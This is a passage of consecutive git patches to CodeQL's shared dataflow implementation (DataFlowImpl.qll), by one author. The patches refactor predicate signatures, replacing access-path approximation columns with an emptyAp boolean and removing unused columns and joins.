pn2, pn3, call, cc, state, ccc, summaryCtx, t, ap, apa, - stored, ret, innerArgApa) and - flowThroughOutOfCall(call, ccc, ret, node, allowsFieldFlow, innerArgApa, apa) and + exists(DataFlowCall call, CcCall ccc, RetNodeEx ret, boolean allowsFieldFlow | + fwdFlowThroughStep1(pn1, pn2, pn3, call, cc, state, ccc, summaryCtx, t, ap, _, stored, + ret, _) and + flowThroughOutOfCall(call, ccc, ret, node, allowsFieldFlow) and not inBarrier(node, state) and if allowsFieldFlow = false then ap instanceof ApNil else any() ) From 7c888ebe062c41026e112e92cf5ca0bfaff1314c Mon Sep 17 00:00:00 2001 From: Anders Schack-Mulligen Date: Tue, 10 Dec 2024 11:43:01 +0100 Subject: [PATCH 0970/1267] Dataflow: Replace some allowsFieldFlow,apa pairs with emptyAp boolean. --- .../codeql/dataflow/internal/DataFlowImpl.qll | 142 +++++++++--------- 1 file changed, 68 insertions(+), 74 deletions(-) diff --git a/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll b/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll index 635e8e24aee..b3563d95861 100644 --- a/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll +++ b/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll @@ -931,12 +931,12 @@ module MakeImpl Lang> { * candidate for the origin of a summary. */ pragma[nomagic] - predicate parameterMayFlowThrough(ParamNodeEx p, Ap ap) { + predicate parameterMayFlowThrough(ParamNodeEx p, boolean emptyAp) { exists(DataFlowCallable c, ReturnKindExt kind | throughFlowNodeCand(p) and returnFlowCallableNodeCand(c, kind) and p.getEnclosingCallable() = c and - exists(ap) and + emptyAp = [true, false] and parameterFlowThroughAllowed(p, kind) ) } @@ -957,12 +957,17 @@ module MakeImpl Lang> { } predicate callEdgeArgParam( - DataFlowCall call, DataFlowCallable c, ArgNodeEx arg, ParamNodeEx p, - boolean allowsFieldFlow, Ap ap + DataFlowCall call, DataFlowCallable c, ArgNodeEx arg, ParamNodeEx p, boolean emptyAp ) { - flowIntoCallNodeCand1(call, arg, p, allowsFieldFlow) and - c = p.getEnclosingCallable() and - exists(ap) + exists(boolean allowsFieldFlow | + flowIntoCallNodeCand1(call, arg, p, allowsFieldFlow) and + c = p.getEnclosingCallable() and + ( + emptyAp = true + or + allowsFieldFlow = true and emptyAp = false + ) + ) } predicate callEdgeReturn( @@ -974,7 +979,7 @@ module MakeImpl Lang> { } predicate relevantCallEdgeIn(DataFlowCall call, DataFlowCallable c) { - callEdgeArgParam(call, c, _, _, _, _) + callEdgeArgParam(call, c, _, _, _) } predicate relevantCallEdgeOut(DataFlowCall call, DataFlowCallable c) { @@ -1000,7 +1005,7 @@ module MakeImpl Lang> { tuples = count(NodeEx n, boolean b | revFlow(n, b)) and calledges = count(DataFlowCall call, DataFlowCallable c | - callEdgeArgParam(call, c, _, _, _, _) or + callEdgeArgParam(call, c, _, _, _) or callEdgeReturn(call, c, _, _, _, _) ) } @@ -1282,7 +1287,7 @@ module MakeImpl Lang> { predicate callMayFlowThroughRev(DataFlowCall call); - predicate parameterMayFlowThrough(ParamNodeEx p, Ap ap); + predicate parameterMayFlowThrough(ParamNodeEx p, boolean emptyAp); predicate returnMayFlowThrough(RetNodeEx ret, ReturnKindExt kind); @@ -1294,8 +1299,7 @@ module MakeImpl Lang> { predicate readStepCand(NodeEx n1, Content c, NodeEx n2); predicate callEdgeArgParam( - DataFlowCall call, DataFlowCallable c, ArgNodeEx arg, ParamNodeEx p, - boolean allowsFieldFlow, Ap ap + DataFlowCall call, DataFlowCallable c, ArgNodeEx arg, ParamNodeEx p, boolean emptyAp ); predicate callEdgeReturn( @@ -1732,34 +1736,19 @@ module MakeImpl Lang> { private module FwdFlowIn { pragma[nomagic] private predicate callEdgeArgParamRestricted( - DataFlowCall call, DataFlowCallable c, ArgNodeEx arg, ParamNodeEx p, boolean emptyAp, - ApApprox apa + DataFlowCall call, DataFlowCallable c, ArgNodeEx arg, ParamNodeEx p, boolean emptyAp ) { - exists(boolean allowsFieldFlow | - PrevStage::callEdgeArgParam(call, c, arg, p, allowsFieldFlow, apa) - | - if - PrevStage::callMayFlowThroughRev(call) and - PrevStage::parameterMayFlowThrough(p, apa) - then - emptyAp = true and - apa instanceof PrevStage::ApNil and - flowThrough() - or - emptyAp = false and - allowsFieldFlow = true and - if allowsFieldFlowThrough(call, c) then flowThrough() else not flowThrough() - else ( - not flowThrough() and - ( - emptyAp = true and - apa instanceof PrevStage::ApNil - or - emptyAp = false and - allowsFieldFlow = true - ) - ) - ) + PrevStage::callEdgeArgParam(call, c, arg, p, emptyAp) and + if + PrevStage::callMayFlowThroughRev(call) and + PrevStage::parameterMayFlowThrough(p, emptyAp) + then + emptyAp = true and + flowThrough() + or + emptyAp = false and + if allowsFieldFlowThrough(call, c) then flowThrough() else not flowThrough() + else not flowThrough() } pragma[nomagic] @@ -1767,7 +1756,7 @@ module MakeImpl Lang> { DataFlowCall call, CcCall ctx ) { result = viableImplCallContextReduced(call, ctx) and - callEdgeArgParamRestricted(call, result, _, _, _, _) + callEdgeArgParamRestricted(call, result, _, _, _) } bindingset[call, ctx] @@ -1783,7 +1772,7 @@ module MakeImpl Lang> { private DataFlowCallable viableImplCallContextReducedInlineLate( DataFlowCall call, ArgNodeEx arg, CcCall ctx ) { - callEdgeArgParamRestricted(call, _, arg, _, _, _) and + callEdgeArgParamRestricted(call, _, arg, _, _) and instanceofCcCall(ctx) and result = viableImplCallContextReducedInlineLate(call, ctx) } @@ -1791,10 +1780,9 @@ module MakeImpl Lang> { bindingset[call] pragma[inline_late] private predicate callEdgeArgParamRestrictedInlineLate( - DataFlowCall call, DataFlowCallable c, ArgNodeEx arg, ParamNodeEx p, boolean emptyAp, - ApApprox apa + DataFlowCall call, DataFlowCallable c, ArgNodeEx arg, ParamNodeEx p, boolean emptyAp ) { - callEdgeArgParamRestricted(call, c, arg, p, emptyAp, apa) + callEdgeArgParamRestricted(call, c, arg, p, emptyAp) } bindingset[call, ctx] @@ -1809,7 +1797,7 @@ module MakeImpl Lang> { private predicate viableImplArgNotCallContextReduced( DataFlowCall call, ArgNodeEx arg, Cc outercc ) { - callEdgeArgParamRestricted(call, _, arg, _, _, _) and + callEdgeArgParamRestricted(call, _, arg, _, _) and instanceofCc(outercc) and viableImplNotCallContextReducedInlineLate(call, outercc) } @@ -1828,7 +1816,7 @@ module MakeImpl Lang> { ) and not outBarrier(arg, state) and not inBarrier(p, state) and - callEdgeArgParamRestrictedInlineLate(call, inner, arg, p, emptyAp, apa) + callEdgeArgParamRestrictedInlineLate(call, inner, arg, p, emptyAp) } pragma[inline] @@ -2072,10 +2060,9 @@ module MakeImpl Lang> { private module FwdTypeFlow = TypeFlow; private predicate flowIntoCallApaTaken( - DataFlowCall call, DataFlowCallable c, ArgNodeEx arg, ParamNodeEx p, - boolean allowsFieldFlow, ApApprox apa + DataFlowCall call, DataFlowCallable c, ArgNodeEx arg, ParamNodeEx p, boolean emptyAp ) { - PrevStage::callEdgeArgParam(call, c, arg, p, allowsFieldFlow, apa) and + PrevStage::callEdgeArgParam(call, c, arg, p, emptyAp) and FwdTypeFlowInput::dataFlowTakenCallEdgeIn(call, c, _) } @@ -2177,16 +2164,16 @@ module MakeImpl Lang> { pragma[nomagic] private predicate flowThroughIntoCall( - DataFlowCall call, ArgNodeEx arg, ParamNodeEx p, boolean allowsFieldFlow, Ap argAp, Ap ap + DataFlowCall call, ArgNodeEx arg, ParamNodeEx p, Ap argAp, Ap ap ) { - exists(ApApprox argApa, Typ argT, TypOption argStored | + exists(ApApprox argApa, Typ argT, TypOption argStored, boolean emptyArgAp | returnFlowsThrough(_, _, _, _, pragma[only_bind_into](p), pragma[only_bind_into](argT), pragma[only_bind_into](argAp), pragma[only_bind_into](argApa), pragma[only_bind_into](argStored), ap) and - flowIntoCallApaTaken(call, _, pragma[only_bind_into](arg), p, allowsFieldFlow, argApa) and + flowIntoCallApaTaken(call, _, pragma[only_bind_into](arg), p, emptyArgAp) and fwdFlow(arg, _, _, _, pragma[only_bind_into](argT), pragma[only_bind_into](argAp), pragma[only_bind_into](argApa), pragma[only_bind_into](argStored)) and - if allowsFieldFlow = false then argAp instanceof ApNil else any() + if argAp instanceof ApNil then emptyArgAp = true else emptyArgAp = false ) } @@ -2194,10 +2181,10 @@ module MakeImpl Lang> { private predicate flowIntoCallAp( DataFlowCall call, DataFlowCallable c, ArgNodeEx arg, ParamNodeEx p, Ap ap ) { - exists(ApApprox apa, boolean allowsFieldFlow | - flowIntoCallApaTaken(call, c, arg, p, allowsFieldFlow, apa) and - fwdFlow(arg, _, _, _, _, ap, apa, _) and - if allowsFieldFlow = false then ap instanceof ApNil else any() + exists(boolean emptyAp | + flowIntoCallApaTaken(call, c, arg, p, emptyAp) and + fwdFlow(arg, _, _, _, _, ap, _, _) and + if ap instanceof ApNil then emptyAp = true else emptyAp = false ) } @@ -2282,7 +2269,7 @@ module MakeImpl Lang> { // flow through a callable exists(DataFlowCall call, ParamNodeEx p, Ap innerReturnAp | revFlowThrough(call, returnCtx, p, state, _, returnAp, ap, innerReturnAp) and - flowThroughIntoCall(call, node, p, _, ap, innerReturnAp) + flowThroughIntoCall(call, node, p, ap, innerReturnAp) ) or // flow out of a callable @@ -2424,10 +2411,13 @@ module MakeImpl Lang> { private predicate revFlowParamToReturn( ParamNodeEx p, FlowState state, ReturnPosition pos, Ap returnAp, Ap ap ) { - revFlow(pragma[only_bind_into](p), state, TReturnCtxMaybeFlowThrough(pos), - apSome(returnAp), pragma[only_bind_into](ap)) and - parameterFlowThroughAllowed(p, pos.getKind()) and - PrevStage::parameterMayFlowThrough(p, getApprox(ap)) + exists(boolean emptyAp | + revFlow(pragma[only_bind_into](p), state, TReturnCtxMaybeFlowThrough(pos), + apSome(returnAp), pragma[only_bind_into](ap)) and + parameterFlowThroughAllowed(p, pos.getKind()) and + PrevStage::parameterMayFlowThrough(p, emptyAp) and + if ap instanceof ApNil then emptyAp = true else emptyAp = false + ) } pragma[nomagic] @@ -2517,13 +2507,21 @@ module MakeImpl Lang> { } pragma[nomagic] - predicate parameterMayFlowThrough(ParamNodeEx p, Ap ap) { + private predicate parameterMayFlowThroughAp(ParamNodeEx p, Ap ap) { exists(ReturnPosition pos | returnFlowsThrough(_, pos, _, _, p, _, ap, _, _, _) and parameterFlowsThroughRev(p, ap, pos, _) ) } + pragma[nomagic] + predicate parameterMayFlowThrough(ParamNodeEx p, boolean emptyAp) { + exists(Ap ap | + parameterMayFlowThroughAp(p, ap) and + if ap instanceof ApNil then emptyAp = true else emptyAp = false + ) + } + pragma[nomagic] private predicate nodeMayUseSummary0(NodeEx n, ParamNodeEx p, FlowState state, Ap ap) { exists(Ap ap0 | @@ -2540,7 +2538,7 @@ module MakeImpl Lang> { pragma[nomagic] additional predicate nodeMayUseSummary(NodeEx n, FlowState state, Ap ap) { exists(ParamNodeEx p | - parameterMayFlowThrough(p, ap) and + parameterMayFlowThroughAp(p, ap) and nodeMayUseSummary0(n, p, state, ap) ) } @@ -2561,7 +2559,7 @@ module MakeImpl Lang> { ) { exists(ParamNodeEx p, Ap innerReturnAp | revFlowThrough(call, returnCtx, p, state, _, returnAp, ap, innerReturnAp) and - flowThroughIntoCall(call, arg, p, _, ap, innerReturnAp) + flowThroughIntoCall(call, arg, p, ap, innerReturnAp) ) } @@ -2574,17 +2572,13 @@ module MakeImpl Lang> { } predicate callEdgeArgParam( - DataFlowCall call, DataFlowCallable c, ArgNodeEx arg, ParamNodeEx p, - boolean allowsFieldFlow, Ap ap + DataFlowCall call, DataFlowCallable c, ArgNodeEx arg, ParamNodeEx p, boolean emptyAp ) { - exists(FlowState state | + exists(FlowState state, Ap ap | flowIntoCallAp(call, c, arg, p, ap) and revFlow(arg, pragma[only_bind_into](state), pragma[only_bind_into](ap)) and revFlow(p, pragma[only_bind_into](state), pragma[only_bind_into](ap)) and - // allowsFieldFlow has already been checked in flowIntoCallAp, since - // `Ap` is at least as precise as a boolean from Stage 2 and - // forward, so no need to check it again later. - allowsFieldFlow = true + if ap instanceof ApNil then emptyAp = true else emptyAp = false | // both directions are needed for flow-through RevTypeFlowInput::dataFlowTakenCallEdgeIn(call, c, _) or @@ -2606,7 +2600,7 @@ module MakeImpl Lang> { } predicate relevantCallEdgeIn(DataFlowCall call, DataFlowCallable c) { - callEdgeArgParam(call, c, _, _, _, _) + callEdgeArgParam(call, c, _, _, _) } predicate relevantCallEdgeOut(DataFlowCall call, DataFlowCallable c) { @@ -2702,7 +2696,7 @@ module MakeImpl Lang> { apNext = ap and ap instanceof ApNil or - callEdgeArgParam(_, _, node, next, _, ap) and + callEdgeArgParam(_, _, node, next, _) and apNext = ap or callEdgeReturn(_, _, node, _, next, _) and From d4044062c511096b0f33899e876bb6e459cda7e0 Mon Sep 17 00:00:00 2001 From: Anders Schack-Mulligen Date: Tue, 10 Dec 2024 12:38:10 +0100 Subject: [PATCH 0971/1267] Dataflow: Remove ApApprox column in out-flow. --- .../codeql/dataflow/internal/DataFlowImpl.qll | 29 ++++++++++--------- 1 file changed, 15 insertions(+), 14 deletions(-) diff --git a/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll b/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll index b3563d95861..4db25288eeb 100644 --- a/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll +++ b/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll @@ -1557,7 +1557,8 @@ module MakeImpl Lang> { summaryCtx = TSummaryCtxSome(node, state, t, ap, stored) or // flow out of a callable - fwdFlowOut(_, _, node, state, cc, summaryCtx, t, ap, apa, stored) + fwdFlowOut(_, _, node, state, cc, summaryCtx, t, ap, stored) and + apa = getApprox(ap) or // flow through a callable exists(DataFlowCall call, CcCall ccc, RetNodeEx ret, boolean allowsFieldFlow | @@ -1939,19 +1940,19 @@ module MakeImpl Lang> { pragma[nomagic] private predicate fwdFlowIntoRet( RetNodeEx ret, FlowState state, CcNoCall cc, SummaryCtx summaryCtx, Typ t, Ap ap, - ApApprox apa, TypOption stored + TypOption stored ) { instanceofCcNoCall(cc) and not outBarrier(ret, state) and - fwdFlow(ret, state, cc, summaryCtx, t, ap, apa, stored) + fwdFlow(ret, state, cc, summaryCtx, t, ap, _, stored) } pragma[nomagic] private predicate fwdFlowOutCand( DataFlowCall call, RetNodeEx ret, CcNoCall innercc, DataFlowCallable inner, NodeEx out, - ApApprox apa, boolean allowsFieldFlow + boolean allowsFieldFlow ) { - fwdFlowIntoRet(ret, _, innercc, _, _, _, apa, _) and + fwdFlowIntoRet(ret, _, innercc, _, _, _, _) and inner = ret.getEnclosingCallable() and ( call = viableImplCallContextReducedReverseInlineLate(inner, innercc) and @@ -1964,9 +1965,9 @@ module MakeImpl Lang> { pragma[nomagic] private predicate fwdFlowOutValidEdge( DataFlowCall call, RetNodeEx ret, CcNoCall innercc, DataFlowCallable inner, NodeEx out, - CcNoCall outercc, ApApprox apa, boolean allowsFieldFlow + CcNoCall outercc, boolean allowsFieldFlow ) { - fwdFlowOutCand(call, ret, innercc, inner, out, apa, allowsFieldFlow) and + fwdFlowOutCand(call, ret, innercc, inner, out, allowsFieldFlow) and FwdTypeFlow::typeFlowValidEdgeOut(call, inner) and outercc = getCallContextReturn(inner, call) } @@ -1974,11 +1975,11 @@ module MakeImpl Lang> { pragma[inline] private predicate fwdFlowOut( DataFlowCall call, DataFlowCallable inner, NodeEx out, FlowState state, CcNoCall outercc, - SummaryCtx summaryCtx, Typ t, Ap ap, ApApprox apa, TypOption stored + SummaryCtx summaryCtx, Typ t, Ap ap, TypOption stored ) { exists(RetNodeEx ret, CcNoCall innercc, boolean allowsFieldFlow | - fwdFlowIntoRet(ret, state, innercc, summaryCtx, t, ap, apa, stored) and - fwdFlowOutValidEdge(call, ret, innercc, inner, out, outercc, apa, allowsFieldFlow) and + fwdFlowIntoRet(ret, state, innercc, summaryCtx, t, ap, stored) and + fwdFlowOutValidEdge(call, ret, innercc, inner, out, outercc, allowsFieldFlow) and not inBarrier(out, state) and if allowsFieldFlow = false then ap instanceof ApNil else any() ) @@ -2022,7 +2023,7 @@ module MakeImpl Lang> { DataFlowCall call, DataFlowCallable c, NodeEx node, FlowState state, Cc cc, Typ t, Ap ap, TypOption stored ) { - fwdFlowOut(call, c, node, state, cc, _, t, ap, _, stored) + fwdFlowOut(call, c, node, state, cc, _, t, ap, stored) } pragma[nomagic] @@ -3299,10 +3300,10 @@ module MakeImpl Lang> { ) or // flow out of a callable - exists(RetNodeEx ret, CcNoCall innercc, boolean allowsFieldFlow, ApApprox apa | + exists(RetNodeEx ret, CcNoCall innercc, boolean allowsFieldFlow | pn1 = TPathNodeMid(ret, state, innercc, summaryCtx, t, ap, stored) and - fwdFlowIntoRet(ret, state, innercc, summaryCtx, t, ap, apa, stored) and - fwdFlowOutValidEdge(_, ret, innercc, _, node, cc, apa, allowsFieldFlow) and + fwdFlowIntoRet(ret, state, innercc, summaryCtx, t, ap, stored) and + fwdFlowOutValidEdge(_, ret, innercc, _, node, cc, allowsFieldFlow) and not inBarrier(node, state) and label = "" and if allowsFieldFlow = false then ap instanceof ApNil else any() From 262f64f03751b93fc4a4df52e252561a0bc3471f Mon Sep 17 00:00:00 2001 From: Anders Schack-Mulligen Date: Tue, 10 Dec 2024 12:42:07 +0100 Subject: [PATCH 0972/1267] Dataflow: Remove unused columns. --- .../codeql/dataflow/internal/DataFlowImpl.qll | 17 ++++++++--------- 1 file changed, 8 insertions(+), 9 deletions(-) diff --git a/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll b/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll index 4db25288eeb..564810f0951 100644 --- a/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll +++ b/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll @@ -1562,7 +1562,7 @@ module MakeImpl Lang> { or // flow through a callable exists(DataFlowCall call, CcCall ccc, RetNodeEx ret, boolean allowsFieldFlow | - fwdFlowThrough(call, cc, state, ccc, summaryCtx, t, ap, apa, stored, ret, _) and + fwdFlowThrough(call, cc, state, ccc, summaryCtx, t, ap, apa, stored, ret) and flowThroughOutOfCall(call, ccc, ret, node, allowsFieldFlow) and not inBarrier(node, state) and if allowsFieldFlow = false then ap instanceof ApNil else any() @@ -2098,10 +2098,9 @@ module MakeImpl Lang> { pragma[nomagic] private predicate fwdFlowThrough( DataFlowCall call, Cc cc, FlowState state, CcCall ccc, SummaryCtx summaryCtx, Typ t, - Ap ap, ApApprox apa, TypOption stored, RetNodeEx ret, ApApprox innerArgApa + Ap ap, ApApprox apa, TypOption stored, RetNodeEx ret ) { - fwdFlowThrough0(call, _, cc, state, ccc, summaryCtx, t, ap, apa, stored, ret, _, - innerArgApa) + fwdFlowThrough0(call, _, cc, state, ccc, summaryCtx, t, ap, apa, stored, ret, _, _) } pragma[nomagic] @@ -3136,10 +3135,10 @@ module MakeImpl Lang> { private predicate fwdFlowThroughStep0( DataFlowCall call, ArgNodeEx arg, Cc cc, FlowState state, CcCall ccc, SummaryCtx summaryCtx, Typ t, Ap ap, ApApprox apa, TypOption stored, RetNodeEx ret, - SummaryCtxSome innerSummaryCtx, ApApprox innerArgApa + SummaryCtxSome innerSummaryCtx ) { fwdFlowThrough0(call, arg, cc, state, ccc, summaryCtx, t, ap, apa, stored, ret, - innerSummaryCtx, innerArgApa) + innerSummaryCtx, _) } bindingset[node, state, cc, summaryCtx, t, ap, stored] @@ -3165,14 +3164,14 @@ module MakeImpl Lang> { private predicate fwdFlowThroughStep1( PathNodeImpl pn1, PathNodeImpl pn2, PathNodeImpl pn3, DataFlowCall call, Cc cc, FlowState state, CcCall ccc, SummaryCtx summaryCtx, Typ t, Ap ap, ApApprox apa, - TypOption stored, RetNodeEx ret, ApApprox innerArgApa + TypOption stored, RetNodeEx ret ) { exists( FlowState state0, ArgNodeEx arg, SummaryCtxSome innerSummaryCtx, ParamNodeEx p, Typ innerArgT, Ap innerArgAp, TypOption innerArgStored | fwdFlowThroughStep0(call, arg, cc, state, ccc, summaryCtx, t, ap, apa, stored, ret, - innerSummaryCtx, innerArgApa) and + innerSummaryCtx) and innerSummaryCtx = TSummaryCtxSome(p, state0, innerArgT, innerArgAp, innerArgStored) and pn1 = mkPathNode(arg, state0, cc, summaryCtx, innerArgT, innerArgAp, innerArgStored) and pn2 = @@ -3189,7 +3188,7 @@ module MakeImpl Lang> { ) { exists(DataFlowCall call, CcCall ccc, RetNodeEx ret, boolean allowsFieldFlow | fwdFlowThroughStep1(pn1, pn2, pn3, call, cc, state, ccc, summaryCtx, t, ap, _, stored, - ret, _) and + ret) and flowThroughOutOfCall(call, ccc, ret, node, allowsFieldFlow) and not inBarrier(node, state) and if allowsFieldFlow = false then ap instanceof ApNil else any() From 882a9857881a11180b253a95e61a552745925f74 Mon Sep 17 00:00:00 2001 From: Anders Schack-Mulligen Date: Tue, 10 Dec 2024 12:43:24 +0100 Subject: [PATCH 0973/1267] Dataflow: Remove useless join. --- .../dataflow/codeql/dataflow/internal/DataFlowImpl.qll | 9 ++++----- 1 file changed, 4 insertions(+), 5 deletions(-) diff --git a/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll b/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll index 564810f0951..914a24dbe2f 100644 --- a/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll +++ b/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll @@ -2166,13 +2166,12 @@ module MakeImpl Lang> { private predicate flowThroughIntoCall( DataFlowCall call, ArgNodeEx arg, ParamNodeEx p, Ap argAp, Ap ap ) { - exists(ApApprox argApa, Typ argT, TypOption argStored, boolean emptyArgAp | + exists(Typ argT, TypOption argStored, boolean emptyArgAp | returnFlowsThrough(_, _, _, _, pragma[only_bind_into](p), pragma[only_bind_into](argT), - pragma[only_bind_into](argAp), pragma[only_bind_into](argApa), - pragma[only_bind_into](argStored), ap) and + pragma[only_bind_into](argAp), _, pragma[only_bind_into](argStored), ap) and flowIntoCallApaTaken(call, _, pragma[only_bind_into](arg), p, emptyArgAp) and - fwdFlow(arg, _, _, _, pragma[only_bind_into](argT), pragma[only_bind_into](argAp), - pragma[only_bind_into](argApa), pragma[only_bind_into](argStored)) and + fwdFlow(arg, _, _, _, pragma[only_bind_into](argT), pragma[only_bind_into](argAp), _, + pragma[only_bind_into](argStored)) and if argAp instanceof ApNil then emptyArgAp = true else emptyArgAp = false ) } From a77adadd0179323fa33b376da00bdc349bb27a86 Mon Sep 17 00:00:00 2001 From: Anders Schack-Mulligen Date: Tue, 10 Dec 2024 12:46:30 +0100 Subject: [PATCH 0974/1267] Dataflow: Remove more unused columns. --- .../codeql/dataflow/internal/DataFlowImpl.qll | 48 +++++++++---------- 1 file changed, 23 insertions(+), 25 deletions(-) diff --git a/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll b/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll index 914a24dbe2f..6b24db3ea0c 100644 --- a/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll +++ b/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll @@ -2069,8 +2069,8 @@ module MakeImpl Lang> { pragma[nomagic] private predicate fwdFlowRetFromArg( - RetNodeEx ret, FlowState state, CcCall ccc, SummaryCtxSome summaryCtx, ApApprox argApa, - Typ t, Ap ap, ApApprox apa, TypOption stored + RetNodeEx ret, FlowState state, CcCall ccc, SummaryCtxSome summaryCtx, Typ t, Ap ap, + ApApprox apa, TypOption stored ) { exists(ReturnKindExt kind, ParamNodeEx p, Ap argAp | instanceofCcCall(ccc) and @@ -2080,7 +2080,6 @@ module MakeImpl Lang> { not outBarrier(ret, state) and kind = ret.getKind() and parameterFlowThroughAllowed(p, kind) and - argApa = getApprox(argAp) and PrevStage::returnMayFlowThrough(ret, kind) ) } @@ -2089,9 +2088,9 @@ module MakeImpl Lang> { private predicate fwdFlowThrough0( DataFlowCall call, ArgNodeEx arg, Cc cc, FlowState state, CcCall ccc, SummaryCtx summaryCtx, Typ t, Ap ap, ApApprox apa, TypOption stored, RetNodeEx ret, - SummaryCtxSome innerSummaryCtx, ApApprox innerArgApa + SummaryCtxSome innerSummaryCtx ) { - fwdFlowRetFromArg(ret, state, ccc, innerSummaryCtx, innerArgApa, t, ap, apa, stored) and + fwdFlowRetFromArg(ret, state, ccc, innerSummaryCtx, t, ap, apa, stored) and fwdFlowIsEntered(call, arg, cc, ccc, summaryCtx, innerSummaryCtx) } @@ -2100,7 +2099,7 @@ module MakeImpl Lang> { DataFlowCall call, Cc cc, FlowState state, CcCall ccc, SummaryCtx summaryCtx, Typ t, Ap ap, ApApprox apa, TypOption stored, RetNodeEx ret ) { - fwdFlowThrough0(call, _, cc, state, ccc, summaryCtx, t, ap, apa, stored, ret, _, _) + fwdFlowThrough0(call, _, cc, state, ccc, summaryCtx, t, ap, apa, stored, ret, _) } pragma[nomagic] @@ -2141,21 +2140,20 @@ module MakeImpl Lang> { pragma[nomagic] private predicate returnFlowsThrough0( - DataFlowCall call, FlowState state, CcCall ccc, Ap ap, ApApprox apa, RetNodeEx ret, - SummaryCtxSome innerSummaryCtx, ApApprox innerArgApa + DataFlowCall call, FlowState state, CcCall ccc, Ap ap, RetNodeEx ret, + SummaryCtxSome innerSummaryCtx ) { - fwdFlowThrough0(call, _, _, state, ccc, _, _, ap, apa, _, ret, innerSummaryCtx, - innerArgApa) + fwdFlowThrough0(call, _, _, state, ccc, _, _, ap, _, _, ret, innerSummaryCtx) } pragma[nomagic] private predicate returnFlowsThrough( RetNodeEx ret, ReturnPosition pos, FlowState state, CcCall ccc, ParamNodeEx p, Typ argT, - Ap argAp, ApApprox argApa, TypOption argStored, Ap ap + Ap argAp, TypOption argStored, Ap ap ) { exists(DataFlowCall call, boolean allowsFieldFlow | - returnFlowsThrough0(call, state, ccc, ap, _, ret, - TSummaryCtxSome(p, _, argT, argAp, argStored), argApa) and + returnFlowsThrough0(call, state, ccc, ap, ret, + TSummaryCtxSome(p, _, argT, argAp, argStored)) and flowThroughOutOfCall(call, ccc, ret, _, allowsFieldFlow) and pos = ret.getReturnPosition() and if allowsFieldFlow = false then ap instanceof ApNil else any() @@ -2168,7 +2166,7 @@ module MakeImpl Lang> { ) { exists(Typ argT, TypOption argStored, boolean emptyArgAp | returnFlowsThrough(_, _, _, _, pragma[only_bind_into](p), pragma[only_bind_into](argT), - pragma[only_bind_into](argAp), _, pragma[only_bind_into](argStored), ap) and + pragma[only_bind_into](argAp), pragma[only_bind_into](argStored), ap) and flowIntoCallApaTaken(call, _, pragma[only_bind_into](arg), p, emptyArgAp) and fwdFlow(arg, _, _, _, pragma[only_bind_into](argT), pragma[only_bind_into](argAp), _, pragma[only_bind_into](argStored)) and @@ -2274,7 +2272,7 @@ module MakeImpl Lang> { // flow out of a callable exists(ReturnPosition pos | revFlowOut(_, node, pos, state, _, _, _, ap) and - if returnFlowsThrough(node, pos, state, _, _, _, _, _, _, ap) + if returnFlowsThrough(node, pos, state, _, _, _, _, _, ap) then ( returnCtx = TReturnCtxMaybeFlowThrough(pos) and returnAp = apSome(ap) @@ -2439,7 +2437,7 @@ module MakeImpl Lang> { ) { exists(RetNodeEx ret, FlowState state, CcCall ccc | revFlowOut(call, ret, pos, state, returnCtx, _, returnAp, ap) and - returnFlowsThrough(ret, pos, state, ccc, _, _, _, _, _, ap) and + returnFlowsThrough(ret, pos, state, ccc, _, _, _, _, ap) and matchesCall(ccc, call) ) } @@ -2508,7 +2506,7 @@ module MakeImpl Lang> { pragma[nomagic] private predicate parameterMayFlowThroughAp(ParamNodeEx p, Ap ap) { exists(ReturnPosition pos | - returnFlowsThrough(_, pos, _, _, p, _, ap, _, _, _) and + returnFlowsThrough(_, pos, _, _, p, _, ap, _, _) and parameterFlowsThroughRev(p, ap, pos, _) ) } @@ -2545,7 +2543,7 @@ module MakeImpl Lang> { pragma[nomagic] predicate returnMayFlowThrough(RetNodeEx ret, ReturnKindExt kind) { exists(ParamNodeEx p, ReturnPosition pos, Ap argAp, Ap ap | - returnFlowsThrough(ret, pos, _, _, p, _, argAp, _, _, ap) and + returnFlowsThrough(ret, pos, _, _, p, _, argAp, _, ap) and parameterFlowsThroughRev(p, argAp, pos, ap) and kind = pos.getKind() ) @@ -3133,11 +3131,11 @@ module MakeImpl Lang> { pragma[nomagic] private predicate fwdFlowThroughStep0( DataFlowCall call, ArgNodeEx arg, Cc cc, FlowState state, CcCall ccc, - SummaryCtx summaryCtx, Typ t, Ap ap, ApApprox apa, TypOption stored, RetNodeEx ret, + SummaryCtx summaryCtx, Typ t, Ap ap, TypOption stored, RetNodeEx ret, SummaryCtxSome innerSummaryCtx ) { - fwdFlowThrough0(call, arg, cc, state, ccc, summaryCtx, t, ap, apa, stored, ret, - innerSummaryCtx, _) + fwdFlowThrough0(call, arg, cc, state, ccc, summaryCtx, t, ap, _, stored, ret, + innerSummaryCtx) } bindingset[node, state, cc, summaryCtx, t, ap, stored] @@ -3162,14 +3160,14 @@ module MakeImpl Lang> { pragma[nomagic] private predicate fwdFlowThroughStep1( PathNodeImpl pn1, PathNodeImpl pn2, PathNodeImpl pn3, DataFlowCall call, Cc cc, - FlowState state, CcCall ccc, SummaryCtx summaryCtx, Typ t, Ap ap, ApApprox apa, - TypOption stored, RetNodeEx ret + FlowState state, CcCall ccc, SummaryCtx summaryCtx, Typ t, Ap ap, TypOption stored, + RetNodeEx ret ) { exists( FlowState state0, ArgNodeEx arg, SummaryCtxSome innerSummaryCtx, ParamNodeEx p, Typ innerArgT, Ap innerArgAp, TypOption innerArgStored | - 